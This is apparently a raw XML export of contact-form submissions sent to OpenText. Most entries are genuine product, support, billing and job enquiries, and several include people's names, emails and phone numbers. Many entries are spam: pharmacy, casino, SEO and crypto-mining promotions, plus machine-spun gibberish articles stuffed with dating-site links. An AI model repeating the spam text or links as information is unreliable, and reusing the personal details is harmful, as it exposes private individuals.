    <t>I'm a worker at Montreal Informática - Brazil, partner of open text and i need access to my support.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous sommes revendeur de logiciels. Nous achetions les logiciels Exceed chez le distributeur ARROW. Qui ne distribue plus vos produits._x000D_
J'ai besoin pour un client de 20 EXCEED single licence avec maintenance et 8 exceed SDK avec maintenance._x000D_
Pouvez-vous m'envoyer une offre ou me donner le nom d'in distributeur._x000D_
_x000D_
Cordialement._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please don't try to contact me. That's a residential phone and I don't need to be contacted. Just wanted to bring the problem re: accessing Federale Customer Story problems to your attention.</t>
  </si>
  <si>
    <t>"Customer Stories" section not working well. Click on "Read the whole story" for Federale (sp?) and I get "page not available". I've tried this several times and get the same thing. And why do I have to go back to google to get "contact Open Text" ?</t>
  </si>
  <si>
    <t>I would like ask a VM of opentext cordy bpms to show my company how business and IT people work together to create BPMS</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
Please may you share a quote for OpenText Customer Client._x000D_
This is to resell to our customer_x000D_
_x000D_
Thanks_x000D_
_x000D_
Andrew</t>
  </si>
  <si>
    <t>tried to buy the Brave Reader but keep getting error message.</t>
  </si>
  <si>
    <t>Cloud Faxing,  Would like demo/meeting with your team.</t>
  </si>
  <si>
    <t>The City of Boston (“the City”), acting by and through its Chief Information Officer (‘the Official”), requests proposals for Forms and Workflow Digitization Solution, as particularly set forth in the Request for Proposals, which may be obtained from the City’s purchasing website and Supplier Portal via boston dot gov /procurement. The deadline for proposals is 6/28.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Nous disposons du produit exceed 14 sous Windows 7. Nous souhaiterions acquérir exceed en version plus récente compatible avec Windows 10._x000D_
Cordialement</t>
  </si>
  <si>
    <t>Ich bitte Sie die Adressdaten aus Ihrer Datei zu löschen._x000D_
Direktion Informatik VBS, Frau Ursula Spicher, Papiermühlestrasse 14, 3003 Bern SCHWEIZ_x000D_
Für eine Rückmeldung danke ich Ihnen zum Voraus bestens._x000D_
Freundliche Grüsse_x000D_
Ursula Spicher</t>
  </si>
  <si>
    <t>Unable to sign in to Hightail</t>
  </si>
  <si>
    <t>Dldkdddndk</t>
  </si>
  <si>
    <t>Hi Support, I created my account on knowledge center today, request you to please give me access to same as Gert Vanhaverbeke._x000D_
Regards,_x000D_
Utsav</t>
  </si>
  <si>
    <t>Do you have reseller pricing for OpenText products and is there any special requirements for reselling?</t>
  </si>
  <si>
    <t>Need to discuss about a business opportunity for implementing big data solution for a utility company.Please loop in the Business development team</t>
  </si>
  <si>
    <t>Enterprise Content Management and Content Services Platform strategy, delivery and execution through people, process, and technology</t>
  </si>
  <si>
    <t xml:space="preserve">hello: l have just implemented globally VIM and have many issues where your EIMEA partner confirmed that is product inneficiencies. _x000D_
_x000D_
I would like to be contacted to review the issues critical to me_x000D_
_x000D_
thanks a lot_x000D_
Lidia </t>
  </si>
  <si>
    <t>Fehlende Zahlungsaufstellung in Höhe von 2999,65 Euro_x000D_
EREF+2073ACH000511_x000D_
SVWZ+DE1020000052262018 _x000D_
Bitte schicken Sie die Zahlungsaufstellung zu meinen Händen._x000D_
Udo.rueffer@telekom.de  Vielen Dank im Voraus</t>
  </si>
  <si>
    <t>un safety and security council subsidiary internal organs_x000D_
_x000D_
the protection council can definitely will to hold or reestablish external serenity as well as,while security below phase VII coming from the un [url=https://prezi.com/ikjzh31sbmgv/reviews-on-chnlovecom-scam-fake/]chnlove scam[/url] charter. supports programs, no more than content 41, involve a wide range of enforcement treatments that do not effectively centered making use of equipped force. due to the fact 1966, the security local authority or council has generated 30 supports routines, present in northern Rhodesia, down africa, the previous Yugoslavia (2), Haiti, iraq (2), Angola, Rwanda, Sierra Leone, Somalia also Eritrea, Eritrea then Ethiopia, Liberia (3), DRC, Cte d'Ivoire, Sudan, Lebanon, DPRK, Iran, Libya (2), Guinea [url=https://www.linkedin.com/in/chnlovepage/]chnlove[/url] Bissau, motorcar, Yemen, southwest Sudan and as a result Mali, and also against ISIL (Da'esh) And al Qaida your Tiban.collateral local authority or council sanctions have taken a number of different forms, looking for loads of plan. the ways want ranged provided by specific market then [url=http://www.chnbride.com/tag/chnlove-com/]chnlove[/url] trade supports to allow them to a great deal highly targeted example branches embargoes, take a trip restrictions, then unforeseen or perhaps even item polices. the safety authorities may have placed supports to aid undisturbed transitions, prevent not for constitutional transitions, constrict terrorism, save your proper rights as well as marketplace not proliferation.sanctions generally perform, generate income or maybe are unsuccessful in vacuum pressure. you see, the dimensions are unquestionably most beneficial at mister system or rebuilding intercontinental piece and in addition shielding so when placed inside of an in depth scheme covering keeping, Peacebuilding and additionally peacemaking. not like the forecasts this sanctions probably are psychological, a lot of people routine</t>
  </si>
  <si>
    <t>quel est le rle du viagra|viagra et prix|el soft que viagra|where can i buy 1 viagra pill|viagra 100mg vs 50mg uk|prostata viagra|buy viagra in cabo|cheap viagra for men uk|viagracialis|canada meds online pill viagra|holland viagra|viagra e seus genericos|50 and 100 mg viagra|old men use viagra and fucking|link for you mexico viagra|viagra ibuprofen interaction|legit places to buy viagra|viagra mail samples|buy viagra jelly visa|the best site viagra rx|viagra ultime notizie|viagra jelly not generic|viagra ordonnance belgique|hay un viagra para mujeres|men for viagra young|viagra nehmen|prezzi di viagra uk|costo de pastillas viagra|viagra curativ|xanax and viagra interaction|who buys viagra online|order viagra sample  here|visit our site viagra samples|wikipedia for viagra|cialisviagra trial pack|uk buy one viagra sample|legal viagra kaufen schweiz|look there mail order viagra|tadalafil vs viagra|buy viagra pfizer online|genericos do viagra nomes|viagra samples from usa|viagra cost in cvs|viagra hllbarhet|we like it buy viagra real|viagra til mnd|viagra online from pfizer|purchase viagra online|25mg viagra not effective|i need viagra samples|purchase viagra delhi|online viagra auftrag|cost of viagra 50mg|viagra 25 mg fiyati|viagra funny adds|mejor viagra natura|original viagra 100mg preis|viagra ad|tomar priligy y viagra|viva viagra music|best price viagra in stores|viagra come acquistar|comprar viagra cialis espana|prices viagra india|usefull link viagra buy now|only now get viagra fast|we use it soft viagra tablets|acheter viagra 100mg pfizer|european pharmacy viagra|meilleur marque de viagra|cheap viagra tablets india|viagra addio|viagra free sample offer|cheap fast viagra|best viagra men uk|viagra online in europa|compra viagra originale|viagra pille frau|any pills like viagra|cialis or viagra 2013|viagra quanto tempo|mex select viagra products|the drugstore viagra|blue pill viagra side effects|uk free sample of viagra|viagra pharmacie gratuit|viagra allo mam|via</t>
  </si>
  <si>
    <t>Hi, we are looking for some software to take measurements from jpg and PDF files, we used to use the free brava reader.  We think the TX or TXL will be sufficient for us but are unsure which one to buy (x3).  We did download a trial version but see this is the IXL version which is probably more than we require.  Could you advise which would be the correct version for our requirements._x000D_
Thanks_x000D_
Michael</t>
  </si>
  <si>
    <t>i would like to know why I am suspended from playing my games. As I have payed the casino in full of all my arrears. I am very upset at the fact that after I have done all this I have now been teased with a 30 dollar credit to play any game but can not. Is that very fair? Please e mail me as soon as possible so that this problem can be solved as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
_x000D_
je souhaiterai être mis en contact avec vos ingénieurs afin de discuter d'un projet autour d'exceed pour un de nos clients. _x000D_
_x000D_
Je vous remercie par avance, </t>
  </si>
  <si>
    <t>Having 2 year experience in manual testing...if any openings then pls let me know..</t>
  </si>
  <si>
    <t>Would like to learn more and possibly evaluate CAPTIVA for a prospective requirement.</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
I am not able to view material of streamserve streamshare community . As announced by OPENTEXT, streamshare community topics can be accessed now on OPENTEXT portal but I see Permission problem here. Could you please help to access them ASAP._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>hope both irritates and in addition hard disks us_x000D_
_x000D_
what function in the game have high hopes play against in regarding both participant and additionally nationalized financial expansion? I came to think it is correct after wedding event two competitions in the main city now both dealing the goals of collections. my first am for those top notch membership along with extremely luxuriant Indians of which, research has revealed, have sharply amplified his or her own disclose pointing to country specific immense success in the. using the caribbean organisation Oxfam, websites 1% of India's wealthiest have possession of 73% of the nation's variety as of jan 2018. think of it._x000D_
_x000D_
Described as the result of "monetary gift, Monopoly and even cronyism" specific power of large choice in a few control comes with forced of india with our planet's number one responsibility of the indegent to the 4th notice world-wide in what amount of us dollar billionaires according to Forbes._x000D_
_x000D_
turn into reasonab, each yawning exceptional inadequate partition is all over this country consists of in so named communist states ergo, asia also has a lot more us dollar billionaires compared with what indian. some capitalists can be found cronies also, there are thousands of in the club that definitely have put powers always on ground breaking goods, day-to-day lives replacing systems, resolution and moreover fortitude. anyone get pleasure from in addition praise these individuals._x000D_
_x000D_
but what do we do about a world practice among growth that many rewards funds through function? Why are the who get larger food for american, formulate particularly avenues not to mention properties, scrap all of my adversaries, tutor our children to satisfy the tired so badly paid out rrn comparison? I shown from this as i tried regardless whether you purchase eight style dish cooked by Daniel Humm, cook who owns Eleven Madison woodland present in los angeles, voted the earth's most suitable eatery of 2017 of the pu</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://seorussian.ru]seorussian.ru[/url] -  [url=http://seorussian.ru]Продвижение сайта[/url] </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://ukzakon.ru] Трудовые споры[/url]        - [url=http://ukzakon.ru]ukzakon.ru[/url]</t>
  </si>
  <si>
    <t>Looking for software solution to automatically capture documents , extract metadata and integrate with SALESFORCE, Document will be linked to to CONTACT or ACCOUNT record in SALESFORCE.</t>
  </si>
  <si>
    <t>To know the opportuniies for testing career for fresh grraduate</t>
  </si>
  <si>
    <t>Technical questions about OpenText cloud (Azure) capabilities and licensing.</t>
  </si>
  <si>
    <t>Invalid Prefix for GTIN "3494800028024" with type "EN"</t>
  </si>
  <si>
    <t>I have been a private user since the predecessor of Hightail and now your registration is too complicated. I cannot get into the usual window to send. Please help I am 94 years old. IT's very urgent  Thank you</t>
  </si>
  <si>
    <t>Interested in trial version to develop POC</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking for a survey software for email. Human resources people need to investigate and be able to see the content of emails on some files._x000D_
Do you have a solution to offer us to help us in our investigation and audit e-mail side._x000D_
P.S. We use Exchange Online from the Office 365 suite._x000D_
Note: We are currently looking for the Intella PRO solution_x000D_
_x000D_
Thank you and have a good start to the week._x000D_
Note: sorry for my english, it is not perfect.</t>
  </si>
  <si>
    <t>We would like a demo of Opentext Documentum</t>
  </si>
  <si>
    <t>Bonjour, après un changement de pc, la clé d'activation du logiciel GUPTA ne fonctionne plus.</t>
  </si>
  <si>
    <t>I can't upload my CV in doc format for a position of Contract Reviewer in your organization. Please help!</t>
  </si>
  <si>
    <t xml:space="preserve">Hola!_x000D_
_x000D_
Pertenezco a una empresa FinTech portuguesa y tenemos en ese momento una oportunidad en una farmacéutica para digitalización de faturas.  ¿Queremos saber si tienen interés en participar con nosotros en esa propuesta?_x000D_
Tenemos un SW de OCR Cognitivo llamado DocDigitizer que con la imagen de la factura (o otros documentos no-estructurados) extrae sus datos para XML (o otros formatos), y necesitamos en nuestra propuesta de un socio que tenga el SW con:_x000D_
       - el procedimiento homologado con la agencia tributaria de firmado electrónico de las facturas;_x000D_
       - la base de datos documental con los procesos de firma planteados por la normativa tributaria, firmando la BBDD a cada cierre del período de liquidación de IVA (uno o tres meses, según corresponda)  y anualmente por el cierre del año fiscal de la compañia._x000D_
_x000D_
¿Tienen interés de hacer un go-to-market conjunto con la utilización de nuestro SW DocDigitizer y su SW certificado? _x000D_
Nuestra idea es que los clientes de su SW pueden tener ventajas grandes con la extracción automática de los datos de las facturas con nuestro DocDigitizer, y si su SW está integrado con nosotros eso es también un selling point de ventaja para su SW._x000D_
_x000D_
¿ Podemos marcar una reunión para hablar de esa oportunidad?_x000D_
_x000D_
Muchas gracias,_x000D_
¡Saludos!_x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
At Desjardins Group, we are using Documentum. We have an old TaskSpace based home development. Do we have a Contract Management compatible with Documentum?_x000D_
If so, I would like to have some documentation and discus further._x000D_
Alexandre Lim_x000D_
alexandre.lim@desjardins.com_x000D_
1 877 828-7800 extension 5562939</t>
  </si>
  <si>
    <t xml:space="preserve">Dears,_x000D_
_x000D_
Good Day,_x000D_
_x000D_
We would like to have a technical meeting with you to discuss and see how it would be efficient to use your workflow in our time attendance applications_x000D_
_x000D_
And how it would be easy to build a workflow for our application_x000D_
_x000D_
Also please advise about your prices for software developer_x000D_
</t>
  </si>
  <si>
    <t>Want to know the Xenos API capability in transformation the big data having size more than 10 MB</t>
  </si>
  <si>
    <t>Enquiry about Sharepoint  and current eDocs interaction</t>
  </si>
  <si>
    <t xml:space="preserve">we have bidding for fax system in Egypt with telecom Egypt and we would like to know if you can cooperate with us to satisfy the customer requirements , please advice_x000D_
_x000D_
•	Unlimited number of users_x000D_
•	High Available solution_x000D_
•	Support assigning mailbox for each user with unique DID_x000D_
•	Support high volume, automated faxing_x000D_
•	Integrate fax with desktop, email, enterprise applications, custom applications, MFPs_x000D_
•	Consolidate and centralize faxing in a single solution, including support for virtual and multi-location environments_x000D_
•	Support business continuity with disaster recovery and high availability configurations_x000D_
•	Fully integrated and centralized fax server_x000D_
•	Integrate with key business applications—ERP, ECM, CRM, EMR and virtually any system for faster and more secure exchange of business-critical documents. _x000D_
•	Use existing telephony infrastructure including Voice over IP for a robust UC strategy that includes fax_x000D_
•	Send faxes as easily as emails with email integration with any SMTP email client_x000D_
•	Secure and trusted form of information exchange_x000D_
•	Point-to-point transmissions are immune to viruses, malware, and interception (unlike email transmissions)_x000D_
•	Help maintain compliance with regulations such as HIPAA, Sarbanes-Oxley, and other information governance requirements_x000D_
•	Ensure digital fax content remains private and does not sit in open public areas with unauthorized access_x000D_
•	Verify document transmission and track fax history with full audit trail_x000D_
•	Better insights and visibility Fax Analytics_x000D_
•	Increase visibility with deeper insights into performance trends and channel usage _x000D_
•	Collaborate more closely with key stakeholders on user and application messaging performance_x000D_
•	Monitor and investigate messaging activity for mission critical applications_x000D_
•	Identify and react faster to messaging bottlenecks, channel saturation, and system alerts_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;kasino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Seeking information about OpenText Captiva Cloud Capture Toolkit for an application we are developing using the Electron framework (JavaScript as native Windows app) that we would like to enable scanning from within and this sounds like a possible solution to allow scanner access from our JavaScript applications.</t>
  </si>
  <si>
    <t xml:space="preserve">I cancelled my service on 5/19, yet you billed me on 5/21.  I have been trying to reach someone to obtain a refund to no avail.  Please help me. </t>
  </si>
  <si>
    <t>Hi!  Im interested n electronic document management system and in automation of the document control processes. Do you have suitable solutions ? How much it costs?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Valeriya_x000D_
_x000D_
Personal Mobile: +77076993573</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://bystrokredit24.ru/tag/vzyat-kredit-v-banki-nalichnymi-russkij-standart]взять кредит в банки наличными русский стандарт[/url] _x000D_
100% ФИНАНСОВАЯ ПОМОЩЬ ВСЕМ! _x000D_
[url=http://bystrokredit24.ru/tag/sberbank-onlajn-raschet-kredita]сбербанк онлайн расчет кредита[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, This is with reference to professional services opportunity for Oracle ATG licenses with one of our existing customers across banking domain. Can you help us in getting aligned with right set of people. Regarding Upgrade for Documentum 6.7 to Documentum 7.x,  Installation and configuration of Documentum 7.x, Migration and configuration of WebTop, Workflows, Content Server to upgraded version. Please help us to reach out to righgt set  of people. Thanks. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Need price for RightFax product. </t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://playcasinoonline24.com/]slots online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playcasinoonline24.com/]play casino games online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>I used to be a Hightail customer but now I cant get into my spaces. Please contect me asap. Angela.</t>
  </si>
  <si>
    <t>Sexual relationship can be a pleasurable give to get relationship with one?s partner. If anything fails with this cooperation process, it's enough to derail the connection. But anything can happen which is unpredictable. Moreover, able to keep a wholesome sexual relationship means keeping oneself physically healthy. So just about any sexual disfunction ought to be given utmost care. One such health hazard is erectile dysfunction commonly present in men. Unable to keep a proper and prolonged penile erection contributes to erectile dysfunction. This is infact a life threatening problem for maintaining a wholesome sexual relationship. So when there arises a real problem it?s a good idea to treat it instead of sitting quiet. _x000D_
 _x000D_
The choice involving the various available treatment plans involve treatment having a proper medicine. Response to a dental agent like Levitra can be very effective on this context. Studies show that impotence problems is primarily because of insufficient flow of blood towards the penis? veins and not enough stimulation at the same time. Practising oral therapy of Levitra increases the rate of the flow of blood that gradually stimulates the penis resulting in a hard erection, adequate with an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is certainly one such drug which can be discovered to be extremely effective. Clinically it's been proved that it even conditions patients who are suffering from various medical problems like blood pressure, high cholesterol or diabetes. A lot of men, who took Levitra for the first time, responded positively for gaining high success rate. Besides, many experts have also found it can be also taken to medicines accustomed to treat other medical ailments. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/tadalafil-pfizer-prix-neuf/"&gt;https://www.cialispascherfr24.com/tadalafil-pfizer-prix-neuf/&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Türkçe dil desteği var mı? 3 kullanıcı için ödecek ücret ne kadar? Güncellemelerden ekstra bedel istenecek mi? </t>
  </si>
  <si>
    <t>I would like to know more about SAP VIM</t>
  </si>
  <si>
    <t>We want cordys process</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://ukzakon.ru] Арбитражные споры[/url]        - [url=http://ukzakon.ru]ukzakon.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Дневники людей, проходящих противовирусную терапию. Сообщаем о ходе терапии, обсуждаем побочки, задаём вопросы прошедшим через всё это, делимся своим опытом  _x000D_
 _x000D_
&lt;a href=https://hcv-forum.ru/&gt;гепатит софосбувир цена&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/]где купить лекарство от гепатита с[/url]_x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/post89.html#p89&gt;купить ледипасвир&lt;/a&gt;_x000D_
&lt;a href=https://www.hcv-forum.ru/post89.html#p89&gt;купить даклатасвир&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>[img]http://partnerkalab.ru/wp-content/uploads/2017/09/rb2.jpg[/img] _x000D_
 _x000D_
[b]Приветственный бонус в размере $30 начисляется после выполнения нескольких простых действий:[/b] _x000D_
 _x000D_
1 Верификация персональных данных- включает необходимость верификации действующего паспорта и реального адреса. _x000D_
2 Верификация личного телефонного номера. _x000D_
3 Пополнение торгового счета собственными средствами на сумму $10. Клиент имеет право, по мере необходимости, вывести эти средства. _x000D_
 _x000D_
Исходя из типа выбранного торгового счета, размер приветственного бонуса составляет $30 либо 3000 Cent. Бонус может зачисляться и в евро. В этом случае, по внутреннему курсу брокерской компании будет произведена конвертация. Клиент компании имеет право на единоразовое получение данного приветственного бонуса. Бонус доступен на платформах MetaTrader 4 и 5 и счетах Fix/Pro-Cent и Fix/Pro-Standard. _x000D_
 _x000D_
[url=http://partnerkalab.ru/roboforex-welcome-bonus-30-usd/]Подробнее как пеолучить 30$[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have updated 2018 SAPPHIRE NOW + ASUG Annual Conference attendees _x000D_
_x000D_
list and we now have a total of 18,156 contacts attending 2018 _x000D_
_x000D_
SAPPHIRE NOW + ASUG Annual Conference._x000D_
_x000D_
Would you be interested in the list of Attendees with complete _x000D_
_x000D_
contact information for pre-show marketing campaign, appointment _x000D_
_x000D_
sitting, networking and various other post-show Marketing _x000D_
_x000D_
initiatives?_x000D_
_x000D_
Data fields: Company names, Contact name, Title designation, email _x000D_
_x000D_
address, phone number, complete mailing address. We only include _x000D_
_x000D_
opt-in contacts in our database. We can also provide free sample for  _x000D_
_x000D_
your verifications._x000D_
_x000D_
Thanks &amp; I’ll look forward to your response._x000D_
_x000D_
Regards,_x000D_
Claire Moore_x000D_
Business Development- Event Attendees Specialist._x000D_
</t>
  </si>
  <si>
    <t>for a job</t>
  </si>
  <si>
    <t>Need support/training to publish documents to ECM through openText web service.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://seorussian.ru/]раскрутка сайта в yandex[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">   </t>
  </si>
  <si>
    <t>Hightail issue - used it for many months and suddenly all I get is a blank black screen. I used IOS (MacBook Pro). When my partners send files, I click on download on the email link, and I get a blank screen. This is a critical issue.</t>
  </si>
  <si>
    <t>[img]http://partnerkalab.ru/wp-content/uploads/2017/12/Kryptex_mayning-520x245.jpg[/img] _x000D_
 _x000D_
[b]Кryptex[/b] — абсолютно бесплатная программа, позволяющая заработать криптовалюту. _x000D_
Данная программа отличается от большинства сервисов для майнинга! _x000D_
 _x000D_
Во-первых, она бесплатная, и это не сервис для клауд-майнинга поскольку здесь многое зависит от мощности компьютера, чем выше производительность компьютера — тем больше можно заработать, а если подключить ферму, то доход будет очень серьёзный. _x000D_
Во-вторых, разработчики предусмотрели вывод денег множеством способов и даже на прямую на банковскую карточку. Среди прочего есть достаточно привычные: Qiwi, Яндекс деньги и Paypal, вывод минималки 50 рублей. _x000D_
 _x000D_
[b]Воспользоваться сервисом очень просто:[/b] _x000D_
 _x000D_
1. нужно скачать приложение; _x000D_
2. [url=http://bidfx.ru/www.kryptex.org]зарегистрироваться[/url] _x000D_
3. включить программу; _x000D_
4. получать выплаты. _x000D_
 _x000D_
Таким образом минимально можно заработать 1500 рублей, получать выплаты при этом можно в биткоинах, рублях, тенге или гривнах. _x000D_
Более подробно как настроить Кryptex, и повысить свою прибыль  [url=http://bidfx.ru/kryptex]читайте тут[/url]</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://playcasinoonline24.com/]casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Please forward to your VP of Sales._x000D_
_x000D_
I've been researching cybersecurity technology companies, in particular in the Identity and Access Management sectors._x000D_
_x000D_
If Open Text is interested in expanding their Sales coverage in the central USA, then please let me know as I would be interested in speaking with you about how my skills, knowledge, and experience in cybersecurity and in Sales might lend itself to helping you grow your revenues. _x000D_
_x000D_
I'm currently consulting to businesses on their cybersecurity strategies, am a board member of our local chapter of ISSA, and was recently inducted into InfraGard._x000D_
_x000D_
If you're growing and want to expand further in this region, then please advise so we can set up a call and talk further._x000D_
_x000D_
Best regards,_x000D_
Mark Langford</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I will have a question for you ?_x000D_
_x000D_
Whit Exchange online, the legal people (Lawyer) want access to the content of the message when they do surveys._x000D_
_x000D_
Do you offer this solution, if so how?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I am a Project Manager at Simon Fraser University (SFU) in Vancouver, BC, Canada. We are looking for an enterprise Digital Asset Management (DAM) Solution that would house our digital assets (videos including assignments, photography, branding assets, ...) and allow users to categorize the assets based on type of data, user groups and use cases, provide editing functionality, allow flexible access configuration, distribution, and sharing. Ideally, the DAM system would be the core infrastructure providing access to various internal and external (to SFU) users based on needs, access and user permissions._x000D_
I'm hoping you have a solution that would meet SFU needs. _x000D_
_x000D_
Thanks._x000D_
Regards,_x000D_
Anna _x000D_
  _x000D_
Anna Chmielewski_x000D_
Project Manager | IT Services _x000D_
Simon Fraser University | SH 1001_x000D_
8888 University Drive | Burnaby, B.C. | V5A 1S6 </t>
  </si>
  <si>
    <t>We are currently a Pro version subscriber to Hightail. We are looking to have dedicated ftp sites for certain clients to upload data files to us. We have our first request from a client currently but with the GDPR now in effect we anticipate more requests. Do you provide this service through hightail or another division??</t>
  </si>
  <si>
    <t>Requesting a Demo.</t>
  </si>
  <si>
    <t>Job requirement</t>
  </si>
  <si>
    <t>Looking for cloud fax service to receive faxes sent to our toll-free # and ROUTE these faxes as a PDF attachment by EMAIL to a specific email address.</t>
  </si>
  <si>
    <t>Need to deploy ECM at Bellefonte Nuclear Plant and migrate data from an existing ECM deployment.</t>
  </si>
  <si>
    <t>We are currently using RightFax 10.6 and I was interested in the hosted RightFax solution and how the service is provided for healthcare to meet HIPPA requirements.</t>
  </si>
  <si>
    <t>good morning , _x000D_
i saw the Technical document specifications about  OpenText Media Managemnt 16.3 version._x000D_
can i install this system to  Google Cloud ? is supported ?_x000D_
thank you, _x000D_
Giovanni B.</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning. We have recently upgraded to RightFax 10.6 FP3SR5 and our administrators are now having trouble viewing faxes from other users in the FaxUtil. They were able to view faxes sent by other users in the domain and check status of faxes on the old client. Is there a setting that re-enables this feature? </t>
  </si>
  <si>
    <t>We are a managed services provider out of Houston Texas. I have a customer in the medical vertical that is looking for an Enterprise grade fax solution 4 eleven locations across the country.</t>
  </si>
  <si>
    <t>Leider funktioniert Einverständniserklärung DSGVO auf webseite nicht: Fehlermeldung bei Email: not valid</t>
  </si>
  <si>
    <t>ydbryh@tulnl.xyz</t>
  </si>
  <si>
    <t>Данная производственная компания TVP более 6 лет выпускает технологическое оснащение для наладки,и выполнения строительных работ очистных сооружений для завода металлоконструкцого.   Вся продукция имеет сертификаты качества. _x000D_
Абсолютно любой человек в  течение собственной жизнедеятельности для различных личных потребностей применяет воду. В процессе ее прямом назначении она загрязняется, видоизменяется ее состав и физические параметры. Для этой цели и прокладываются очистные сооружения. _x000D_
 _x000D_
Очистные сооружения –  система устройств в канализационном комплексе производственного поселка, основной функцией которого является очистка сточных вод от различных видов загрязнения..     Выполняется равным образом их рецикл и повторнаяиспользование в технических  нуждах всевозможных фирм. _x000D_
 _x000D_
В  следствиичистки стоков производств в местных сооружениях максимальная плотность загрязняющих элементов понижается, а содержащиеся в  их составе полезные элементы извлекаются. В  будущемпотребности воды отправляются на доочистку в общепроизводственных сооружениях. _x000D_
TVP - это компания, которая  устанавливает, проектирует, а также занимается возведеньем очистных построек для механического завода. _x000D_
Принимаем заказы на замену, исправление,проектирование,в всяком городе Нашей страны. _x000D_
Работы производятся быстро и в срок. _x000D_
 _x000D_
 _x000D_
решетки очистных сооружений: [url=https://tvprus.ru/]очистка очистных сооружений[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I guess we need to renew our support contract since I'm unable to enter a developer support ticket.   I didn't get an email notification unless it went to my CFO or Network admin.  Can you please verify. </t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение сайта комплексно[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>We are looking for a cloud based document retention software solution for our HR data. _x000D_
 We have 950 active employees in the US and 6 in the EU and 2 in Cayman Islands.  We would like the solution to have workflow functionality and a forms generator.  We would like all employees and managers to have access to the system to retrieve prior performance reviews, etc. and we would like to use the workflow capabilities for on-boarding, HR approval process for new hires and transfers, and we would like to build a performance review form with workflow capabilities using tools to automate the process of approval, storage and retrieval.  We are also interested in having the ability to purge documents/folders, etc. according to our records retention policies.</t>
  </si>
  <si>
    <t>Archive server error hdsk write job failed in our DR server</t>
  </si>
  <si>
    <t>READ BLUEPRINTED</t>
  </si>
  <si>
    <t>behind the scenes employing Hillary Clinton promote_x000D_
_x000D_
digital photographer Callie covering had gone backstage while using Hillary Clinton on job intended for msnbc along at the [url=https://mydatingdirectory.net/sites/russian-dating/charmdate.com/]charmdate.com[/url] 2016 Democratic national established practice. a new outlooks listed within this commentary seem to be hers._x000D_
_x000D_
Philadelphia (fox news)Twenty three years ago, i was a recently engaged along with white company shooter, doing work for vice president al Gore, marriage ceremony an employee greetings jointly gripped frist by guy Hillary Clinton. [url=http://www.prweb.com/releases/charmingdate/charmingdate_scam_protect/prweb11792473.htm]charmdate.com[/url] the lady introduced at the case which often had to be reforming the rules. girls would be permitted to wear dirt bike pants._x000D_
_x000D_
in thurs night dark, I photographed Clinton backstage equally your girl metamorphosed an additional regulation in bright white room, recognizing the Democratic presidential nomination to become the first lady to be nominated as a individual or group candidate in north america._x000D_
_x000D_
I watched since Clinton believed her very own modest Chelsea, who had been from time, on the hosting space in your yard. the previous admin regarding assert came out tighten, nevertheless, not stressed. jane was being established, aware of the weight this key fact message knowledgeable entirely on other people, And i additionally wouldn't really mean the result the talk would have for my child candidacy, if i think your girl was regarded as conscious of this too. I means that he was aware of it is an essential time girls in such a spot._x000D_
_x000D_
Backstage, itself, next in a very keeping area with your ex wife family, staff moreover each other, Clinton have also been an individual who, no matter what happens [url=http://charmingdate.overblog.com/]charmdate.com[/url] beneath couple of months, And in that evening hours the equivalent of, boasted actually successfu</t>
  </si>
  <si>
    <t>my customer ask me to get the price list of documentum license and I need also what is your partner name in Indonesia, then call me at cell phone +62811811343. This is important. Thank you.</t>
  </si>
  <si>
    <t>How much money OpenText Information Hub for 5 users.</t>
  </si>
  <si>
    <t>Interested in the Secure Mail service, If you could provide some pricing and confirm it can be integrated in Office 365 using Outlook_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
